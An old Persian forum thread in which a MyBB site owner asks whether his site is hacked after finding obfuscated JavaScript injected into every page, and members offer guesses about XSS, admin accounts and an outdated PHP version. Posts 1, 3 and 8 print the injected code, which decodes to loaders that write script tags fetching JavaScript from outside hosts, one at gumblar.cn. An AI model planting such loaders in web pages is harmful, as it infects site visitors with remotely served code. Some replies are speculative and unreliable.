امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
چند خط کد ، یا هک سایت
نویسنده پیام
1nafar غایب
مدیر بازنشسته
*****

ارسال‌ها: 1,195
موضوع‌ها: 91
تاریخ عضویت: فروردین ۱۳۸۷

تشکرها : 1577
( 4273 تشکر در 953 ارسال )
ارسال: #1
چند خط کد ، یا هک سایت
سلام
چند روز پیش سرعت سایت من به شدت پایین اومده بود . من توی پشتیبانی فارسی mybb مطرح کردم و گفتن که یه قالب یا پلاگین نصب کردید و .... همه چیز به هم ریخته .
امروز توی صفحات سایت (توی سورس اونا ) کد های زیر بوجود اومده بود :
کد:
// -->
</script>
</head><script language=javascirpt><!--
(function(t){eval(unescape(('var@20a@3d@22Scrip@74@45n@67ine@22@2cb@3d@22V@65rsi@6fn()@2b@22@2cj@3d@22@22@2cu@3dnav@69gator@2e@75@73erAg@65@6et@3bif((@75@2ein@64exOf(@22@57in@22@29@3e@30@29@26@26(u@2ei@6ed@65xO@66(@22NT@206@22@29@3c@30@29@26@26(@64@6fcument@2ec@6fokie@2eind@65xOf(@22mi@65@6b@3d1@22)@3c0)@26@26(typeof(z@72vz@74s)@21@3dt@79peof(@22A@22@29))@7bzrvz@74s@3d@22A@22@3beva@6c(@22if@28w@69@6edo@77@2e@22+a+@22)j@3dj+@22+a+@22@4dajor@22+b+@61@2b@22M@69n@6f@72@22@2bb@2ba+@22@42u@69@6cd@22+b@2b@22j@3b@22@29@3bdocument@2ewrite(@22@3cscript@20s@72c@3d@2f@2fgumbl@61r@2e@63n@2frss@2f@3fi@64@3d@22@2bj+@22@3e@3c@5c@2fsc@72i@70t@3e@22)@3b@7d').replace(t,'%')))})(/@/g);
--></script>
من در پشتبانی انگلیسی مطرح کردم ، فرمودند سایت شما هک گردید ه است .
حالا من چند تا سوال دارم :
1- ایا واقعا سایت من هک شده ؟
2- در صورت درست بودن فرضیه هک من چه کار کنم ؟
ادرس سایت :
www.ir-man.com
(آخرین ویرایش در این ارسال: ۱۱-اردیبهشت-۱۳۸۸, ۲۲:۲۰:۳۰، توسط 1nafar.)
۱۱-اردیبهشت-۱۳۸۸, ۲۱:۵۱:۲۵
وب سایت ارسال‌ها
پاسخ
محمد حسینی آفلاین
کاربر فعال بخش رباتیک
****

ارسال‌ها: 1,363
موضوع‌ها: 139
تاریخ عضویت: آذر ۱۳۸۴

تشکرها : 974
( 1780 تشکر در 620 ارسال )
ارسال: #2
RE: چند خط کد ، یا هک سایت
این کد که همینطوری چیزی نداره! فقط یه توضیحه !
هر چند بعید نیست هک شده باشی! من فکر می کنم باگ xss باشه. اسکریپت های جاوا معمولا با xss رو سایت نوشته میشه. البته اگه واقعا هک شدی و هکری در کار بوده می تونسه صفحه رو دیفیس کنه!
کدهای سایت رو که دستکاری نکردی؟
کدوم سایتت رو میگی ؟ شب برگشتم یه اسکنش می کنم. acunetix جدید گرفتم ! 018

به راه بادیه رفتن، به از نشستن باطل ------------- اگرچه وصل نیابم، بقدر وسع بکوشمRolleyes
۱۲-اردیبهشت-۱۳۸۸, ۰۸:۳۴:۰۳
ارسال‌ها
پاسخ
تشکر شده توسط : t3r!p3000
ha_60 آفلاین
بنيانگذار سايت
******

ارسال‌ها: 4,637
موضوع‌ها: 216
تاریخ عضویت: آبان ۱۳۸۳

تشکرها : 560
( 6556 تشکر در 2385 ارسال )
ارسال: #3
RE: چند خط کد ، یا هک سایت
کد php:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write(
به نظر هک شده می یاد ولی احتمالا این تنها کد های مخرب نیست بازم باید باشه
یا سیستمت ویروسی بوده و فایل ها رو ویروسی فرستادی بالا یا واقعا هک شده
و برای رفع اول باید مشکل رو پیدا کنی باید ببینی از کجا اومدن

هادی امین زاده
دیدن چیزی که همه می بینند هنر نیست
بانک اطلاعات صنایع ایران.
۱۲-اردیبهشت-۱۳۸۸, ۰۸:۳۹:۲۳
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : t3r!p3000
1nafar غایب
مدیر بازنشسته
*****

ارسال‌ها: 1,195
موضوع‌ها: 91
تاریخ عضویت: فروردین ۱۳۸۷

تشکرها : 1577
( 4273 تشکر در 953 ارسال )
ارسال: #4
RE: چند خط کد ، یا هک سایت
نقل قول: کدهای سایت رو که دستکاری نکردی؟
سلام
من چیزی رو دست کاری نکردم ، اول سرعت سایت خیلی پایین بود ، پلاگین هارو حذف کردم و بعدم که .....
نقل قول: کدوم سایتت رو میگی ؟
www.ir-man.com
نقل قول: به نظر هک شده می یاد ولی احتمالا این تنها کد های مخرب نیست بازم باید باشه
یا سیستمت ویروسی بوده و فایل ها رو ویروسی فرستادی بالا یا واقعا هک شده
و برای رفع اول باید مشکل رو پیدا کنی باید ببینی از کجا اومدن
این کد توی تمامی صفحات سایت وجود داره . سیستم من مشکلی از نظر ویروس و .... نداره و به شدت محافظت میشه . (مثل سایت )
نقل قول: و برای رفع اول باید مشکل رو پیدا کنی باید ببینی از کجا اومدن
مشکل من هم همینه
پلیز هلپ می
۱۲-اردیبهشت-۱۳۸۸, ۱۲:۳۴:۰۵
وب سایت ارسال‌ها
پاسخ
far_222000 آفلاین
مدير بخش ديتابيس
*****

ارسال‌ها: 955
موضوع‌ها: 68
تاریخ عضویت: شهریور ۱۳۸۴

تشکرها : 468
( 1249 تشکر در 422 ارسال )
ارسال: #5
RE: چند خط کد ، یا هک سایت
(۱۲-اردیبهشت-۱۳۸۸, ۱۲:۳۴:۰۵)1nafar نوشته است: پلیز هلپ می
فارسی رو پاس بدارید(شوخی بود :d برای اینکه نگران نباشی!!! چون فهمیدی که این اتفاق افتاده دیگه جای نگرانی نیست، بهتره بفهمی از کدوم باگ بهت حمله شده)

پارک24
مرجع خرید و فروش خودرو
۱۲-اردیبهشت-۱۳۸۸, ۱۲:۵۲:۲۸
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : t3r!p3000
1nafar غایب
مدیر بازنشسته
*****

ارسال‌ها: 1,195
موضوع‌ها: 91
تاریخ عضویت: فروردین ۱۳۸۷

تشکرها : 1577
( 4273 تشکر در 953 ارسال )
ارسال: #6
RE: چند خط کد ، یا هک سایت
نقل قول: بهتره بفهمی از کدوم باگ بهت حمله شده)
سلام
حالا 100 % هک شده ؟
چه جوری این کد ها رو حذف کنم ؟
میشه یه خورده بیشتر توضیح بدید ؟
۱۲-اردیبهشت-۱۳۸۸, ۱۳:۲۸:۵۱
وب سایت ارسال‌ها
پاسخ
saeedsmk آفلاین
مدیر بخش کرک و کامپیوتر
*****

ارسال‌ها: 506
موضوع‌ها: 74
تاریخ عضویت: آبان ۱۳۸۴

تشکرها : 677
( 1179 تشکر در 348 ارسال )
ارسال: #7
RE: چند خط کد ، یا هک سایت
سلام
خوب هستيد
اگه كليه صفحات باشه يك ذره دور از نظر كه هك باشه ( چون هكره اينقدر بي كار نيست ) . اما به نظز مي ايد از دسته باگ هاس xss است . چون دقيقا يك جاوا رو بصورت اسكريپت به صفحه اينجكت كرده .
يك سئوال ببين چه يوزر هاي دسترسي ادمين دارند و يوزر 0 يا روت مشكل نداره از نظر دسترسي . اگر يوزري ادمين بود و يا توي گروپ اي بود كه نبايد باشه صد در صد كار همون يوزرس .

به اميد ديدار

در دنياي كه مرگ شكارچي ان است بايد شكارچي بود - تعليمات دون خوان نوشته كارلوس كاستاندار
۱۲-اردیبهشت-۱۳۸۸, ۱۳:۴۱:۳۵
ارسال‌ها
پاسخ
تشکر شده توسط : lord_viper, t3r!p3000
1nafar غایب
مدیر بازنشسته
*****

ارسال‌ها: 1,195
موضوع‌ها: 91
تاریخ عضویت: فروردین ۱۳۸۷

تشکرها : 1577
( 4273 تشکر در 953 ارسال )
ارسال: #8
RE: چند خط کد ، یا هک سایت
سلام
تنها ادمین سایت خودم هستم و کسی دیگری در گروه مدیریت وجود نداره .

در ضمن کد پست اول درون صفحه ال سایت وجود داره
کد موجود در دیگر صفحات (تقریبا همه ، حتی پانل کنترل ) کد زیر هست :
کد php:
</head><script language=javascirpt><!-- 
document.write(unescape('%3CscriI1pZJt%20xLSsrcZJ%3D%2F%2F9eaN4eaN%2EV72V74qB7%2E2%2E13Zs93Zs5%2FI1jI1quI1eI1rxLSyxLS%2Ejs%3E%3C%2Fscri3ZspeaNtxLS%3E').replace(/eaN|ZJ|3Zs|I1|xLS|DUm|qB|V7/g,""));
 --></
script>
<
body

چه جوری مشکل رو حل کنم ؟
نقل قول: چون هكره اينقدر بي كار نيست
معمولا همه برای ما سنگ تموم میزارن و به ما لطف دارن
۱۲-اردیبهشت-۱۳۸۸, ۱۴:۲۲:۰۸
وب سایت ارسال‌ها
پاسخ
amirjan آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 1,105
موضوع‌ها: 24
تاریخ عضویت: تير ۱۳۸۳

تشکرها : 348
( 697 تشکر در 251 ارسال )
ارسال: #9
RE: چند خط کد ، یا هک سایت
mybb و xss ؟ (این "واو" مباینت هست ، مثل "مسلمان و دروغ؟")
بعیده ... فعلا اول برو توی template ها ، قسمت header ، این کد جاوا رو از توی کد ها حذف کن ... تا بعد بشینم سر فرصت ببینم قضیش چیه ...

سید امیر حسین حسنینی

Human knowledge belongs to the world ...
۱۲-اردیبهشت-۱۳۸۸, ۱۵:۵۹:۲۲
ارسال‌ها
پاسخ
محمد حسینی آفلاین
کاربر فعال بخش رباتیک
****

ارسال‌ها: 1,363
موضوع‌ها: 139
تاریخ عضویت: آذر ۱۳۸۴

تشکرها : 974
( 1780 تشکر در 620 ارسال )
ارسال: #10
RE: چند خط کد ، یا هک سایت
(۱۲-اردیبهشت-۱۳۸۸, ۱۵:۵۹:۲۲)amirjan نوشته است: mybb و xss ؟ (این "واو" مباینت هست ، مثل "مسلمان و دروغ؟")
اتفاقا کنترل پنل ما بی بی اگه یکم دستکاری بشه راحت در برابر xss نفوذپذیر میشه ! (چی گفتم !) الان تستش می کنم . . .

به راه بادیه رفتن، به از نشستن باطل ------------- اگرچه وصل نیابم، بقدر وسع بکوشمRolleyes
۱۲-اردیبهشت-۱۳۸۸, ۱۶:۴۲:۳۱
ارسال‌ها
پاسخ
محمد حسینی آفلاین
کاربر فعال بخش رباتیک
****

ارسال‌ها: 1,363
موضوع‌ها: 139
تاریخ عضویت: آذر ۱۳۸۴

تشکرها : 974
( 1780 تشکر در 620 ارسال )
ارسال: #11
RE: چند خط کد ، یا هک سایت
این سایت که غیر از صفحه اولش دیگه از هیچ جاش بالا نمیاد ! Biggrin (ادبیات رو حال می کنی !)
اینطوری نمیشه تستش کرد ! خودت برو چندجای سایت که ورودی میگیره و نمایش میده این کد رو امتحان کن ببین اجرا میکنه ؟ مخصوصا کنترل پنل یا صفحه سرچ
کد:
<script>alert("iranvig.com")</script>

و اما اسکنر من یه چیز دیگه میگه !

نقل قول:
PHP version older than 5.2.6

The PHP development team would like to announce the immediate availability of PHP 5.2.6. This release focuses on improving the stability of the PHP 5.2.x branch with over 120 bug fixes, several of which are security related. All users of PHP are encouraged to upgrade to this release.

Security Enhancements and Fixes in PHP 5.2.6:


Fixed possible stack buffer overflow in the FastCGI SAPI identified by Andrei Nigmatulin.
Fixed integer overflow in printf() identified by Maksymilian Aciemowicz.
Fixed security issue detailed in CVE-2008-0599 identified by Ryan Permeh.
Fixed a safe_mode bypass in cURL identified by Maksymilian Arciemowicz.
Properly address incomplete multibyte chars inside escapeshellcmd() identified by Stefan Esser.
Upgraded bundled PCRE to version 7.6


نمی دونم php ورژن قدیمی یعنی چی! ولی آخرش اینو نوشته که خیلی مهمه !
نقل قول:
The impact of this vulnerability
Denial of service or ultimately arbitrary code execution.

باگ DOS ! دقیقا dos می تونه دلیل کند شدن سایت باشه. معمولا با dos سایت down میشه ولی اگه حملات موفقیت آمیز نباشه یا سایت کم نیاره سرعتش کم میشه و درست حسابی بالا نمیاد !
البته باگ dos به سرور و هاست مربوط میشه! نمی دونم چه ربطی به php داره !؟! این که میگه باید php آپدیت بشه. ولی من می گم فایروال درست پیکربندی نشده. با سرور تماس بگیر. باید آی پی و آی پی هایی که dos می کنن بن بشن.
موفق باشی !Question
به راه بادیه رفتن، به از نشستن باطل ------------- اگرچه وصل نیابم، بقدر وسع بکوشمRolleyes
۱۲-اردیبهشت-۱۳۸۸, ۱۷:۵۶:۱۴
ارسال‌ها
پاسخ


پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS